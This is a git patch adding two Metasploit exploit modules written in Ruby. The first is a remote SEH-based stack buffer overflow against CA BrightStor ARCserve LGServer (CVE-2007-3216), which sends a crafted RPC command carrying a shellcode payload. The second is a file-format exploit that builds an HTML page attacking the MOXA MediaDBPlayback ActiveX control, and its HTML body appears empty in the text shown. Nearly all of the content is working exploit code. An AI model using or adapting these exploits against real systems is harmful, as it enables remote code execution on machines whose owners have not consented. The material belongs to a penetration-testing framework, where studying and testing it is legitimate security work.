From f517b88d9c7a6cd29979a1d87bdab813d9042ec9 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Thu, 4 Nov 2010 22:19:26 +0000 Subject: [PATCH] added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb git-svn-id: file:///home/svn/framework3/trunk@10904 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/brightstor/lgserver_multi.rb | 112 ++++++++++++++++++ .../fileformat/moxa_mediadbplayback.rb | 107 +++++++++++++++++ 2 files changed, 219 insertions(+) create mode 100644 modules/exploits/windows/brightstor/lgserver_multi.rb create mode 100644 modules/exploits/windows/fileformat/moxa_mediadbplayback.rb diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb new file mode 100644 index 0000000000..ae0fdc6083 --- /dev/null +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -0,0 +1,112 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup + for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, + an attacker could overflow the buffer and execute arbitrary code. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2007-3216' ], + [ 'OSVDB', '35329' ], + [ 'BID', '24348' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ], + ], + 'DisclosureDate' => 'Jun 6 2007', + 'DefaultTarget' => 0)) + + register_options([ Opt::RPORT(1900) ], self.class) + end + + def check + + connect + + sock.put("0000000019rxrGetServerVersion") + ver = sock.get_once + + disconnect + + if ( ver =~ /11.1.742/ ) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + + end + + def exploit + + connect + + rpc_commands = [ + "rxsAddNewUser", + "rxsSetUserInfo", + "rxsRenameUser", + "rxsExportData", + "rxcReadSaveSetProfile", + "rxcInitSaveSetProfile", + "rxcAddSaveSetNextAppList", + "rxcAddSaveSetNextFilesPathList" + ] + + rpc_command = rpc_commands[rand(rpc_commands.length)] + + data = rand_text_alpha_upper(62768) + + data[58468,8] = generate_seh_record(target.ret) + data[58476,payload.encoded.length] = payload.encoded + + sploit = "0000062768" # Command Length Field + sploit << rpc_command # RPC Command + sploit << "~~" # Constant Argument Delimiter + sploit << data + + print_status("Trying target #{target.name} with command '#{rpc_command}'...") + sock.put(sploit) + + handler + disconnect + + end + +end diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb new file mode 100644 index 0000000000..2d6b9bf81a --- /dev/null +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -0,0 +1,107 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = AverageRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When + sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) + an attacker may be able to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'MC' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://www.moxa.com' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] + ], + 'DisclosureDate' => 'Oct 19 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), + ], self.class) + end + + def exploit + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) + + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) + + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(content) + end + +end